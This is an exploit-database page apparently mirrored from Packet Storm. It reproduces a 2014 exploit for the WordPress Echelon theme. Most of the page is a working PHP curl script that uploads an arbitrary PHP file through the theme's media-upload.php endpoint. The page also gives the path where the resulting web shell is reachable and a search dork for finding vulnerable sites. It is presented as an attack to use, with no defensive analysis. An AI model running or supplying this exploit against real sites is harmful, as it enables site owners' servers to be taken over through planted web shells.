Lucene search
K

WordPress Echelon Theme Shell Upload

🗓️ 25 Apr 2014 00:00:00Reported by th3rockst3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

WordPress Echelon Theme Shell Upload exploit via media-upload.ph

Code
`# Exploit Author:Th3 R0cksT3r  
# Exploit Title: WordPress Echelon Theme Shell Upload  
# Date: 25.04.2014  
# Email: [email protected]   
# Vendor Homepage: http://wordpress.org/  
# Google Dork: inurl:/wp-content/themes/echelon/  
  
  
  
  
#Exploit :  
==========  
  
<?php  
$uploadfile="file.php";  
$ch = curl_init("  
http://127.0.0.1/wp-content/themes/echelon/lib/admin/functions/media-upload.php");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch,  
CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch); print "$postResult";  
?>  
  
  
=========  
  
  
  
Shell Access: http://localhost/wp-content/uploads/[years]/[month]/file.php  
  
  
  
  
  
Greets: Bangladesh Black HAT Hackers  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation